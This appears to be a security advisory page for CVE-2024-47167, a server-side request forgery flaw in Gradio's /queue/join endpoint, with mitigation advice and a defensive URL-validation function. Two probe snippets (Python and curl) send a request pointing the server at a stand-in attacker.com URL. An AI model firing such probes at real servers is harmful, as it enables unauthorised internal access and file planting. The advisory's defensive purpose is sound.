Platform
python
Component
gradio
Fixed in
5.0.1
5.0.0
CVE-2024-47167 describes a Server-Side Request Forgery (SSRF) vulnerability affecting Gradio versions up to 5.0.0b9. This flaw allows attackers to manipulate the /queue/join endpoint, forcing the Gradio server to make HTTP requests to attacker-controlled URLs. Successful exploitation could lead to unauthorized access to internal resources and potential data exfiltration.
The SSRF vulnerability in Gradio's /queue/join endpoint poses a significant risk. An attacker can supply a URL that the Gradio server will fetch on their behalf, reaching internal services that are not directly accessible from the outside and potentially exposing sensitive data or performing actions with the server's network position. Because the server downloads the content from these external URLs and stores it locally, the flaw also gives attackers a way to place files of their choosing on the server. This is particularly concerning in environments where Gradio is used to expose machine learning models or other internal applications.
CVE-2024-47167 was publicly disclosed on 2024-10-10. No known public proof-of-concept exploits are currently available, but the SSRF nature of the vulnerability makes it likely that one will emerge. The vulnerability is not currently listed on CISA KEV. Given the ease of SSRF exploitation and the potential for internal network access, this vulnerability warrants prompt attention.
Organizations deploying Gradio to expose machine learning models or other internal applications are at significant risk. Shared hosting environments where multiple users share the same Gradio instance are particularly vulnerable, as an attacker could potentially exploit the vulnerability to target other users' data or resources.
• python / gradio:
    import urllib3

    # Probe: send a URL-bearing request to /queue/join and report the status.
    # This shows only whether the endpoint accepts such a request; it does not
    # confirm that the server fetched the URL.
    http = urllib3.PoolManager()
    try:
        response = http.request(
            "GET",
            "http://your-gradio-server/queue/join?url=http://attacker.com/malicious.txt",
        )
        print(response.status)
    except Exception as e:
        print(f"Error: {e}")
• generic web:
    # Same probe with curl; -I requests headers only, grep surfaces any redirect.
    curl -I 'http://your-gradio-server/queue/join?url=http://attacker.com/malicious.txt' | grep -i 'Location:'
Disclosure
Exploit status
EPSS
0.24% (47th percentile)
CISA SSVC
CVSS vector
The primary mitigation for CVE-2024-47167 is to upgrade Gradio to version 5.0.0 or later, which contains the fix. If an immediate upgrade is not feasible, apply temporary workarounds. Restrict the Gradio server's outbound network access (egress filtering) so that it can reach only the external hosts it legitimately needs, and block connections from it to internal address ranges. A Web Application Firewall (WAF) in front of the server can reject inbound requests to /queue/join whose payload carries URLs pointing at internal addresses or unusual ports, but a WAF does not see the server's own outbound requests; egress filtering has to cover those. Carefully review and validate any user-provided URLs before they are used in HTTP requests. After upgrading, confirm the fix by submitting a request to /queue/join that references an internal address and verifying that the server refuses to fetch it.
Update the Gradio library to version 5.0.0 or later. Alternatively, disable URL-based inputs in your Gradio application or restrict them to trusted domains. Implement stricter URL validation and make sure that local or internal network addresses cannot be requested through the `/queue/join` endpoint.
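The URL-validation workaround above is easy to get wrong: checking the hostname string alone misses decimal IP forms, IPv4-mapped IPv6 literals and names that resolve to internal addresses. The following is an added example written for this page, not Gradio's own code or the fix shipped in 5.0.0. It resolves the host, judges every returned address against loopback, private, link-local, multicast and reserved space, and returns the vetted addresses so the caller can pin its connection to them. The function names, the `SsrfBlocked` exception and the `DEMO_DNS` table are assumptions made for illustration; the table is a constructed stand-in for DNS so the example runs offline.

```python
import ipaddress
import socket
from urllib.parse import urlparse

# Added example for this page (not Gradio code): a guard for user-supplied URLs
# that a server would fetch on the user's behalf. Function names and the demo
# DNS table below are assumptions made for illustration.

ALLOWED_SCHEMES = ("http", "https")


class SsrfBlocked(ValueError):
    """Raised when a URL must not be fetched server-side."""


def is_public_address(ip) -> bool:
    # An IPv4-mapped IPv6 literal such as ::ffff:127.0.0.1 must be judged as IPv4.
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    # is_global excludes loopback, RFC 1918, link-local (including the
    # 169.254.169.254 cloud metadata address), CGNAT 100.64/10, 0.0.0.0/8 and
    # the documentation ranges; multicast and reserved space are refused as well.
    return ip.is_global and not ip.is_multicast and not ip.is_reserved


def validate_url(url, resolver=socket.getaddrinfo):
    """Return the public IP addresses (as strings) that the URL's host maps to.

    Raises SsrfBlocked for anything that would reach non-public address space.
    Every resolved record is checked, and the checked addresses are returned so
    the caller can connect to exactly those (address pinning): a second lookup
    by the HTTP client could otherwise be rebound to an internal address.
    """
    parsed = urlparse(url)
    scheme = parsed.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        raise SsrfBlocked(f"scheme not allowed: {parsed.scheme!r}")
    if parsed.username is not None or parsed.password is not None:
        raise SsrfBlocked("userinfo in URL is not allowed")  # http://x@evil/ tricks
    host = parsed.hostname
    if not host:
        raise SsrfBlocked("missing host")
    try:
        port = parsed.port or (443 if scheme == "https" else 80)
    except ValueError as exc:  # urlparse raises for non-numeric/out-of-range ports
        raise SsrfBlocked(f"bad port in {url!r}") from exc

    try:
        # A literal address is judged directly ...
        candidates = [ipaddress.ip_address(host)]
    except ValueError:
        # ... a name is resolved and every record judged. Decimal or hex forms
        # such as http://2130706433/ are not literals to urlparse, yet the
        # resolver turns them into 127.0.0.1, so this path catches them too.
        try:
            records = resolver(host, port, 0, socket.SOCK_STREAM)
        except socket.gaierror as exc:
            raise SsrfBlocked(f"cannot resolve {host!r}") from exc
        candidates = [ipaddress.ip_address(r[4][0].split("%")[0]) for r in records]
        if not candidates:
            raise SsrfBlocked(f"no addresses for {host!r}")

    blocked = [str(ip) for ip in candidates if not is_public_address(ip)]
    if blocked:
        raise SsrfBlocked(f"{host!r} maps to non-public address(es): {blocked}")
    return [str(ip) for ip in candidates]


def is_safe_url(url, resolver=socket.getaddrinfo) -> bool:
    """Boolean form of validate_url for callers that only need a verdict."""
    try:
        validate_url(url, resolver)
    except SsrfBlocked:
        return False
    return True


# Constructed DNS table for an offline demonstration; production code keeps the
# default resolver (socket.getaddrinfo). "rebind.example" models an answer set
# that mixes a public address with an internal one.
DEMO_DNS = {
    "public.example": ["93.184.216.34"],
    "rebind.example": ["93.184.216.34", "10.0.0.5"],
    "meta.example": ["169.254.169.254"],
    "2130706433": ["127.0.0.1"],  # what inet_aton makes of a decimal literal
}


def demo_resolver(host, port, family=0, socktype=0, proto=0, flags=0):
    """Stand-in for socket.getaddrinfo that answers only from DEMO_DNS."""
    if host not in DEMO_DNS:
        raise socket.gaierror(f"{host}: name not known")
    return [(socket.AF_INET, socket.SOCK_STREAM, 6, "", (a, port)) for a in DEMO_DNS[host]]


if __name__ == "__main__":
    for url in ("http://public.example/model.bin", "http://rebind.example/",
                "http://meta.example/latest/meta-data/", "http://2130706433/",
                "http://[::ffff:10.0.0.1]/", "ftp://public.example/"):
        print(f"{url:45} safe={is_safe_url(url, resolver=demo_resolver)}")
```

Two design points matter when wiring this into a download path. First, the HTTP client must connect to one of the returned addresses (sending the original hostname in the Host header or SNI) rather than resolving the name again, otherwise a DNS answer that changes between the check and the fetch defeats the guard. Second, redirects must not be followed automatically; each Location value has to go through `validate_url` again, because a public host can redirect to an internal address.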
CVE-2024-47167 is a Server-Side Request Forgery (SSRF) vulnerability in Gradio versions up to 5.0.0b9, allowing attackers to force the server to make HTTP requests to attacker-controlled URLs.
If you are using Gradio version 5.0.0b9 or earlier, you are potentially affected by this SSRF vulnerability. Assess your environment and upgrade as soon as possible.
Upgrade Gradio to version 5.0.0 or later to remediate the vulnerability. Implement temporary workarounds like WAF rules and network restrictions if immediate upgrade is not possible.
While no public exploits are currently known, the SSRF nature of the vulnerability suggests potential for exploitation. Monitor your systems and apply the fix promptly.
Refer to Gradio's GitHub security advisories for detailed information and updates: https://github.com/gradio-app/gradio/security/advisories